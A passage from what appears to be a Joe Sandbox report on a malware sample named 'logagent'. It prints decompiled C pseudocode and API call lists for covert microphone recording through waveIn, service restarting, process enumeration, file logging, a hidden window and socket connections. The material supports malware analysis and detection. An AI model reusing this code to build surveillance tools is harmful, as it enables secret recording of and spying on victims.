                                  0x10542eb9
                                  0x10542ecb
                                  0x10542ed4
                                  0x10542edd
                                  0x10542ee2
                                  0x10542eeb
                                  0x10542ef0
                                  0x10542ef9
                                  0x10542f00
                                  0x10542f0e
                                  0x10542f1d
                                  0x10542f24
                                  0x10542f46
                                  0x10542f4c
                                  0x10542f51
                                  0x10542f64
                                  0x10542f7a
                                  0x10542f8a
                                  0x10542f8f
                                  0x10542f95
                                  0x10542f9b
                                  0x10542fa1
                                  0x10542fa7
                                  0x10542fb6
                                  0x10542fc2
                                  0x10542fcc

                                  APIs
                                  • CreateDirectoryW.KERNEL32(00000000), ref: 10542EB9
                                  • atoi.MSVCRT ref: 10542F0E
                                  • waveInOpen.WINMM(0041B210,000000FF,0041B218,00401640,00000000), ref: 10542F51
                                  • waveInPrepareHeader.WINMM(0041B1A0,00000020), ref: 10542FA7
                                  • waveInAddBuffer.WINMM(0041B1A0,00000020), ref: 10542FB6
                                  • waveInStart.WINMM ref: 10542FC2
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStartatoi
                                  • String ID:
                                  • API String ID: 2107868235-0
                                  • Opcode ID: a81ee29a87741cd966a90a2b0f2956d3742d3c5c18b5f5da173d6798908fe62b
                                  • Instruction ID: 8e427d1cf2f75dad540067c46b89d0e5d098ab247d33cd2c2400334c849a1b82
                                  • Opcode Fuzzy Hash: a81ee29a87741cd966a90a2b0f2956d3742d3c5c18b5f5da173d6798908fe62b
                                  • Instruction Fuzzy Hash: 9621F471640604EBC3009FA5FC5CAEA7BA5FB88390B01C57AE915CA3B0D7B85485CBCC
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 10553156 Relevance: 9.1, APIs: 6, Instructions: 61serviceCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 42%
                                  			E10553156(void* _a4) {
				intOrPtr _v28;
				struct _SERVICE_STATUS _v32;
				signed int _t13;
				int _t22;
				void* _t25;
				void* _t26;
				intOrPtr* _t27;

				_t22 = 0;
				_t26 = OpenSCManagerW(0, 0, 0x11);
				_t25 = OpenServiceW(_t26,  *0x41532c(), 0xf003f);
				if(_t25 != 0) {
					if(ControlService(_t25, 1,  &_v32) != 0) {
						do {
							QueryServiceStatus(_t25,  &_v32);
						} while (_v28 != 1);
						_t13 = StartServiceW(_t25, 0, 0);
						asm("sbb eax, eax");
						_t22 = ( ~_t13 & 0x000000fe) + 3;
					} else {
						_t22 = 2;
					}
					_t27 =  *0x415068;
					 *_t27(_t26);
					 *_t27(_t25);
				} else {
					CloseServiceHandle(_t26);
				}
				 *0x415350();
				return _t22;
			}










                                  0x1055315f
                                  0x10553173
                                  0x10553183
                                  0x10553187
                                  0x105531a1
                                  0x105531a7
                                  0x105531ac
                                  0x105531b2
                                  0x105531bb
                                  0x105531c3
                                  0x105531ca
                                  0x105531a3
                                  0x105531a3
                                  0x105531a3
                                  0x105531cd
                                  0x105531d3
                                  0x105531d6
                                  0x10553189
                                  0x1055318a
                                  0x1055318a
                                  0x105531db
                                  0x105531e7

                                  APIs
                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,0041B310,?,?,?,?,?,?,?,10552A60), ref: 10553165
                                  • OpenServiceW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,10552A60), ref: 1055317D
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,10552A60), ref: 1055318A
                                  • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,?,10552A60), ref: 10553199
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Service$Open$CloseControlHandleManager
                                  • String ID:
                                  • API String ID: 1243734080-0
                                  • Opcode ID: a490ed44b7af5fe9121cd1156266513f1612a8d37615e270cb9315c7a913b310
                                  • Instruction ID: cc893da63c933595284d596cdde44f0a94fbaa846c8815915db1173caa0d243b
                                  • Opcode Fuzzy Hash: a490ed44b7af5fe9121cd1156266513f1612a8d37615e270cb9315c7a913b310
                                  • Instruction Fuzzy Hash: 5B01C471650918EFD3006FB0EC89DFF3F6CEB8A395B008421F906D2051DB648E4ADAE5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00405532 Relevance: 9.1, APIs: 6, Instructions: 59sleepfileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 59%
                                  			E00405532(void* __ecx) {
				signed int _t8;
				WCHAR* _t9;
				long _t12;
				void* _t21;
				void* _t22;
				void* _t28;

				_t8 =  *0x41b988; // 0x989680
				_t9 = _t8 |  *0x41b98c;
				_t22 = __ecx;
				if(_t9 != 0) {
					 *((char*)(__ecx + 0x30)) = 0;
					do {
						__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
						_t9 = CreateFileW(_t9, 0x80000000, 7, 0, 3, 0x80, 0);
						_t21 = _t9;
						if(_t21 == 0xffffffff) {
							 *((char*)(_t22 + 0x30)) = 0;
						} else {
							_t12 = GetFileSize(_t21, 0);
							_t28 = 0 -  *0x41b98c; // 0x0
							if(_t28 >= 0 && (_t28 > 0 || _t12 >=  *0x41b988)) {
								 *((char*)(_t22 + 0x30)) = 1;
								if( *((intOrPtr*)(_t22 + 0x3c)) != 0) {
									E00405D50(_t22);
								}
								Sleep(0x2710);
							}
							_t9 = CloseHandle(_t21);
						}
					} while ( *((char*)(_t22 + 0x30)) == 1);
					if( *((intOrPtr*)(_t22 + 0x3c)) == 0 &&  *0x41b154 == 0x31) {
						__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z(_t22 + 0x54);
						return E00405180(_t22);
					}
				}
				return _t9;
			}









                                  0x00405532
                                  0x00405538
                                  0x00405540
                                  0x00405542
                                  0x0040554a
                                  0x0040554d
                                  0x00405562
                                  0x00405569
                                  0x0040556f
                                  0x00405574
                                  0x004055b6
                                  0x00405576
                                  0x00405578
                                  0x00405580
                                  0x00405586
                                  0x00405595
                                  0x00405599
                                  0x0040559d
                                  0x0040559d
                                  0x004055a7
                                  0x004055a7
                                  0x004055ae
                                  0x004055ae
                                  0x004055b9
                                  0x004055c2
                                  0x004055d6
                                  0x00000000
                                  0x004055de
                                  0x004055c2
                                  0x004055e6

                                  APIs
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(80000000,00000007,00000000,00000003,00000080,00000000,00415664,?,0041BCB0,00405614), ref: 00405562
                                  • CreateFileW.KERNEL32(00000000), ref: 00405569
                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 00405578
                                  • Sleep.KERNEL32(00002710), ref: 004055A7
                                  • CloseHandle.KERNEL32(00000000), ref: 004055AE
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004055D6
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FileG@2@@std@@G@std@@U?$char_traits@V?$allocator@$??0?$basic_string@?c_str@?$basic_string@CloseCreateHandleSizeSleepV01@@
                                  • String ID:
                                  • API String ID: 3524115370-0
                                  • Opcode ID: 9bf14a5df145d5f41df20096633609b72b1ec63d739e420429c19bf5600fe5fe
                                  • Instruction ID: 936fdab3816807404b6184885be68073097791833a96003579df1cad0b33865a
                                  • Opcode Fuzzy Hash: 9bf14a5df145d5f41df20096633609b72b1ec63d739e420429c19bf5600fe5fe
                                  • Instruction Fuzzy Hash: 2B115670181E40BFDB216334AD8C7AB7BA9EB41300F40843BE582936D0C7B868448F1C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1055549E Relevance: 9.1, APIs: 6, Instructions: 55windowstringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 105554B8
                                    • Part of subcall function 10555557: RegisterClassExA.USER32(00000030), ref: 1055559D
                                    • Part of subcall function 10555557: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 105555B8
                                    • Part of subcall function 10555557: GetLastError.KERNEL32(?,00000000), ref: 105555C2
                                  • ExtractIconA.SHELL32(00000000,?,00000000), ref: 105554EF
                                  • lstrcpyn.KERNEL32(0041C218,00000040), ref: 10555507
                                  • Shell_NotifyIcon.SHELL32(00000000,0041C200), ref: 1055551D
                                  • TranslateMessage.USER32(?), ref: 1055553A
                                  • DispatchMessageA.USER32(?), ref: 10555544
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: IconMessage$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                  • String ID:
                                  • API String ID: 969601869-0
                                  • Opcode ID: 5db49f3c559ac23c5e5b4a4de78144058b1f4a1bd7bc86c7a9fc6dac82a1e8bb
                                  • Instruction ID: 38412bd8fbca00535a23dd265aa81f677f25aef7e69c69943dba909195d6325c
                                  • Opcode Fuzzy Hash: 5db49f3c559ac23c5e5b4a4de78144058b1f4a1bd7bc86c7a9fc6dac82a1e8bb
                                  • Instruction Fuzzy Hash: DF115EB2841229BBD7109BD0EC8CFDB3FBCEB89355F008162B619D2060D7B89545CBA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00412DDF Relevance: 9.0, APIs: 6, Instructions: 48fileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 58%
                                  			E00412DDF(void _a4, void* _a8) {
				struct _OVERLAPPED* _t13;
				void* _t16;
				long _t17;
				void* _t19;

				_t13 = 0;
				_t19 = CreateFileW(_a4, 0x80000000, 3, 0, 3, 0x80, 0);
				if(_t19 != 0xffffffff) {
					_t17 = GetFileSize(_t19, 0);
					__imp__?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXID@Z(_t17, 0, _t16);
					_t8 =  &_a4;
					_a4 = 0;
					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
					if(ReadFile(_t19,  &_a4, _t17, _t8, 0) != 0) {
						_t13 = 1;
					}
					CloseHandle(_t19);
					return _t13;
				}
				return 0;
			}







                                  0x00412de3
                                  0x00412dff
                                  0x00412e04
                                  0x00412e16
                                  0x00412e1a
                                  0x00412e23
                                  0x00412e29
                                  0x00412e2c
                                  0x00412e3d
                                  0x00412e3f
                                  0x00412e3f
                                  0x00412e42
                                  0x00000000
                                  0x00412e48
                                  0x00000000

                                  APIs
                                  • CreateFileW.KERNEL32(7620F560,80000000,00000003,00000000,00000003,00000080,00000000,00000000,7620F560,?,00409C9F,00000000), ref: 00412DF9
                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,00409C9F,00000000), ref: 00412E0D
                                  • ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXID@Z.MSVCP60(00000000,00000000,?,?,00409C9F,00000000), ref: 00412E1A
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,00000000,?,?,00409C9F,00000000), ref: 00412E2C
                                  • ReadFile.KERNEL32(00000000,00000000,?,?,00409C9F,00000000), ref: 00412E34
                                  • CloseHandle.KERNEL32(00000000,?,00409C9F,00000000), ref: 00412E42
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$D@2@@std@@D@std@@U?$char_traits@V?$allocator@$?c_str@?$basic_string@?resize@?$basic_string@CloseCreateHandleReadSize
                                  • String ID:
                                  • API String ID: 2061410294-0
                                  • Opcode ID: fa4d467d17345bb80924ef3185be0a48566cc4f8ae095e8dcd31704ebaf267b8
                                  • Instruction ID: e286a7eceb6258eec42f82ecdc09f82327f8599071822df4e1fbbe5006a6f2d0
                                  • Opcode Fuzzy Hash: fa4d467d17345bb80924ef3185be0a48566cc4f8ae095e8dcd31704ebaf267b8
                                  • Instruction Fuzzy Hash: EBF08171241518BFEB125F60EC88FFB7B6CEB867A4F108126FD15D6290CA744E418668
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1054B3BE Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 228synchronizationCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,0041BCB0,00000000), ref: 1054B3D8
                                  • Process32NextW.KERNEL32(?,0000022C), ref: 1054B4B2
                                    • Part of subcall function 105544A4: OpenProcess.KERNEL32(00000400,00000000,?,?,1054B52E,?), ref: 105544BA
                                  • wcslen.MSVCRT ref: 1054B5B4
                                  • CreateMutexA.KERNEL32(00000000,00000001,00416510), ref: 1054B604
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateFileModuleMutexNameNextOpenProcessProcess32wcslen
                                  • String ID: Program Files\
                                  • API String ID: 3958954344-650562868
                                  • Opcode ID: 28a475965148f6e0499b9abca16bb89debcb3f8bdba6418509cba6558f06b768
                                  • Instruction ID: d97902fa069cc774e3ad64716ba6848e8ab2ee94079610361561769ec47105fc
                                  • Opcode Fuzzy Hash: 28a475965148f6e0499b9abca16bb89debcb3f8bdba6418509cba6558f06b768
                                  • Instruction Fuzzy Hash: 58810D7680050EEBDF049BA0EC59AEEBF78EF48355F144066F506E70A0EB71668ACF54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 105546E5 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58fileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E105546E5(void* __ecx, void* _a4, long _a8, long _a12, intOrPtr _a16) {
				long _v8;
				long _v12;
				intOrPtr _t14;
				struct _OVERLAPPED* _t19;
				long _t22;
				struct _OVERLAPPED* _t24;
				void* _t28;

				_t24 = 0;
				_t14 = _a16;
				if(_t14 == 0) {
					_v12 = 0x40000000;
					_v8 = 2;
				} else {
					if(_t14 == 1) {
						_t22 = 4;
						_v12 = _t22;
						_v8 = _t22;
					}
				}
				_t28 = CreateFileW(_a12, _v12, _t24, _t24, _v8, 0x80, _t24);
				if(_t28 != 0xffffffff) {
					if(_a16 != 1 || SetFilePointer(_t28, _t24, _t24, 2) != 0xffffffff) {
						if(WriteFile(_t28, _a4, _a8,  &_a12, _t24) != 0) {
							_t24 = 1;
						}
					}
					CloseHandle(_t28);
					_t19 = _t24;
				} else {
					_t19 = 0;
				}
				return _t19;
			}










                                  0x105546ee
                                  0x105546f1
                                  0x105546f3
                                  0x10554703
                                  0x1055470a
                                  0x105546f5
                                  0x105546f6
                                  0x105546fa
                                  0x105546fb
                                  0x105546fe
                                  0x105546fe
                                  0x105546f6
                                  0x10554728
                                  0x1055472d
                                  0x10554737
                                  0x1055475d
                                  0x1055475f
                                  0x1055475f
                                  0x1055475d
                                  0x10554762
                                  0x10554768
                                  0x1055472f
                                  0x1055472f
                                  0x1055472f
                                  0x1055476d

                                  APIs
                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,[DEBUG],00000000), ref: 10554722
                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 1055473E
                                  • WriteFile.KERNEL32(00000000,40000000,?,?,00000000), ref: 10554755
                                  • CloseHandle.KERNEL32(00000000), ref: 10554762
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$CloseCreateHandlePointerWrite
                                  • String ID: [DEBUG]
                                  • API String ID: 3604237281-1240233238
                                  • Opcode ID: b6fc8936da6e294b4790fd661f23c461e372249c0823290801eb98338cb1c386
                                  • Instruction ID: c6a9e73b7491868b70ac6a25d6c3371e3c621a62e19ebc15af1f08b98d335358
                                  • Opcode Fuzzy Hash: b6fc8936da6e294b4790fd661f23c461e372249c0823290801eb98338cb1c386
                                  • Instruction Fuzzy Hash: A611C471610109FFDF018FA49D88EDF7F6CEB0A3A8F208522F91196090CB714E059F60
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00413BC8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 53registryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 71%
                                  			E00413BC8() {
				char _v20;
				struct _WNDCLASSEXA _v68;
				struct HWND__* _t21;
				signed int _t23;

				_t23 = 0xb;
				memset( &(_v68.style), 0, _t23 << 2);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsw");
				_v68.cbSize = 0x30;
				asm("movsb");
				_v68.lpszClassName =  &_v20;
				_v68.style = 0;
				_v68.lpfnWndProc = E00413C3F;
				_v68.cbClsExtra = 0;
				_v68.cbWndExtra = 0;
				_v68.lpszMenuName = 0;
				if(RegisterClassExA( &_v68) == 0) {
					L3:
					return 0;
				}
				_t21 = CreateWindowExA(0,  &_v20, 0, 0, 0, 0, 0, 0, 0xfffffffd, 0, 0, 0);
				if(_t21 == 0) {
					GetLastError();
					goto L3;
				}
				return _t21;
			}







                                  0x00413bd4
                                  0x00413bd8
                                  0x00413be2
                                  0x00413be3
                                  0x00413be4
                                  0x00413be5
                                  0x00413bea
                                  0x00413bf1
                                  0x00413bf2
                                  0x00413bfb
                                  0x00413bfe
                                  0x00413c05
                                  0x00413c08
                                  0x00413c0b
                                  0x00413c17
                                  0x00413c39
                                  0x00000000
                                  0x00413c39
                                  0x00413c29
                                  0x00413c31
                                  0x00413c33
                                  0x00000000
                                  0x00413c33
                                  0x00413c3e

                                  APIs
                                  • RegisterClassExA.USER32(00000030), ref: 00413C0E
                                  • CreateWindowExA.USER32 ref: 00413C29
                                  • GetLastError.KERNEL32(?,00000000), ref: 00413C33
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ClassCreateErrorLastRegisterWindow
                                  • String ID: 0$MsgWindowClass
                                  • API String ID: 2877667751-2410386613
                                  • Opcode ID: c722dd2e6d169ed387903e3056205791a775bb0513f46e273fb6c6412d1be798
                                  • Instruction ID: 7311bfe71f6f07f925a5bea5fd399074fa81e1952be4f1bddfc29815928cdf0b
                                  • Opcode Fuzzy Hash: c722dd2e6d169ed387903e3056205791a775bb0513f46e273fb6c6412d1be798
                                  • Instruction Fuzzy Hash: D5019A72C00228AACB21CF91EC08ADFBFB9EF45761B004026F410B6240D7B05606CAE4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004032B3 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0040B522: RegOpenKeyExA.KERNELBASE(?,80000002,00000000,00020119,80000002,00000000), ref: 0040B551
                                    • Part of subcall function 0040B522: RegQueryValueExA.KERNELBASE(80000002,004140D8,00000000,00000000,?,00000400), ref: 0040B56E
                                    • Part of subcall function 0040B522: RegCloseKey.ADVAPI32(80000002), ref: 0040B577
                                    • Part of subcall function 0040B522: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 0040B596
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,0041BCB0,0040310B,0041BA38,0041BCB0,00000000), ref: 004032DA
                                  • atoi.MSVCRT ref: 004032E1
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,0041BCB0,0040310B,0041BA38,0041BCB0,00000000), ref: 004032ED
                                  Strings
                                  • SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 004032C1
                                  • CurrentBuildNumber, xrefs: 004032BC
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@??1?$basic_string@?c_str@?$basic_string@CloseD@1@@OpenQueryValueatoi
                                  • String ID: CurrentBuildNumber$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                  • API String ID: 1453687294-3377751560
                                  • Opcode ID: 11ba8fd773ccb4f0d3c70d753f9be5e0adae2c01f6dbf8595f5c6f89531c0230
                                  • Instruction ID: fd2564c0d0cdcb3147c4efd585e8939db476c869aa5c4bae27b80d41888a3fe0
                                  • Opcode Fuzzy Hash: 11ba8fd773ccb4f0d3c70d753f9be5e0adae2c01f6dbf8595f5c6f89531c0230
                                  • Instruction Fuzzy Hash: FFE04F72A00618E7C700B7A8DC0AFEEB768EB44755F504479B922A21D2EA749518C69C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004126EF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 18threadCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E004126EF(char _a4) {
				void* _t2;
				void* _t3;

				_t1 =  &_a4; // 0x40e322
				_t2 = GetCurrentProcess();
				_t3 = GetCurrentThread();
				return DuplicateHandle(GetCurrentProcess(), _t3, _t2,  *_t1, 0, 1, 2);
			}





                                  0x004126ff
                                  0x00412702
                                  0x00412705
                                  0x00412717

                                  APIs
                                  • GetCurrentProcess.KERNEL32("@,00000000,00000001,00000002,0041B310,?,0040E322,?), ref: 00412702
                                  • GetCurrentThread.KERNEL32 ref: 00412705
                                  • GetCurrentProcess.KERNEL32(00000000,?,0040E322,?), ref: 0041270C
                                  • DuplicateHandle.KERNEL32(00000000,?,0040E322,?), ref: 0041270F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Current$Process$DuplicateHandleThread
                                  • String ID: "@
                                  • API String ID: 3566409357-445313631
                                  • Opcode ID: cb8128faa2ef6cb65fcd5fe63ceb2ad590a4a68b38e9fedc2e9405bf734d92d8
                                  • Instruction ID: 81c68930a35107f79e7ff7c0b5ef314a0f7766eb9aca927b546ed436d96719c8
                                  • Opcode Fuzzy Hash: cb8128faa2ef6cb65fcd5fe63ceb2ad590a4a68b38e9fedc2e9405bf734d92d8
                                  • Instruction Fuzzy Hash: FFD09E71D40718B7D91127E5AC0DFCA3F1CDB49771F108421F60896090CAA594408A94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1054B839 Relevance: 7.7, APIs: 5, Instructions: 162processCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 1055447A: GetCurrentProcess.KERNEL32(1054A8C9,?,?,1054A8C9,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 1055448B
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 1054B85E
                                  • Process32FirstW.KERNEL32(00000000,?), ref: 1054B87F
                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 1054B88C
                                  • CloseHandle.KERNEL32(00000000,00000000,0000022C,00000000,?,00000002,00000000), ref: 1054BA4E
                                    • Part of subcall function 105544A4: OpenProcess.KERNEL32(00000400,00000000,?,?,1054B52E,?), ref: 105544BA
                                    • Part of subcall function 105540A7: _itoa.MSVCRT ref: 105540C5
                                    • Part of subcall function 105544D9: OpenProcess.KERNEL32(00000410,00000000,1054B4C8,00415208), ref: 105544ED
                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 1054BA3F
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ProcessProcess32$NextOpen$CloseCreateCurrentFirstHandleSnapshotToolhelp32_itoa
                                  • String ID:
                                  • API String ID: 2412981405-0
                                  • Opcode ID: bf4972b6c10139aa3afd5fd5ed8bf260e7c4fdaf8674d90ab9cd4ae4e4143e54
                                  • Instruction ID: d2ca8770ec0baa679e8e2a90c9d43d1ca1d1179deabba5aa99ebb802afd1ac71
                                  • Opcode Fuzzy Hash: bf4972b6c10139aa3afd5fd5ed8bf260e7c4fdaf8674d90ab9cd4ae4e4143e54
                                  • Instruction Fuzzy Hash: A3511C7580021EEBCF11DBA0DD59EEEBB7CEF94645F1041A6B506E2061EA70AB4DCF60
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 105482E1 Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                                  Download Yara Rule
                                  APIs
                                  • toupper.MSVCRT ref: 105483F0
                                  • toupper.MSVCRT ref: 10548319
                                    • Part of subcall function 10546E78: SetEvent.KERNEL32(?,?,1054866C,?,?,?,?,?,00415D88), ref: 10546EA7
                                  • tolower.MSVCRT ref: 105483C9
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: toupper$Eventtolower
                                  • String ID:
                                  • API String ID: 633968009-0
                                  • Opcode ID: ff00c2dc7da0c86a1395fab722e2c7252abcf6f7f8c2e66e61c4919710f3609e
                                  • Instruction ID: b23e722ba459281cd730ed195749097366a0f17601b6bf0604d10c1d85165db5
                                  • Opcode Fuzzy Hash: ff00c2dc7da0c86a1395fab722e2c7252abcf6f7f8c2e66e61c4919710f3609e
                                  • Instruction Fuzzy Hash: 5D41A271904648EBDB00E7E4E859AFFBF78EB84741F24486AF402D3190EB716A19C796
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040ACE6 Relevance: 7.6, APIs: 5, Instructions: 51COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00402038: socket.WS2_32(00000000,00000001,00000006), ref: 00402053
                                    • Part of subcall function 0040209B: connect.WS2_32(0041BE70,0041BE74,00000010), ref: 004020B1
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,0041B310,?), ref: 0040AD26
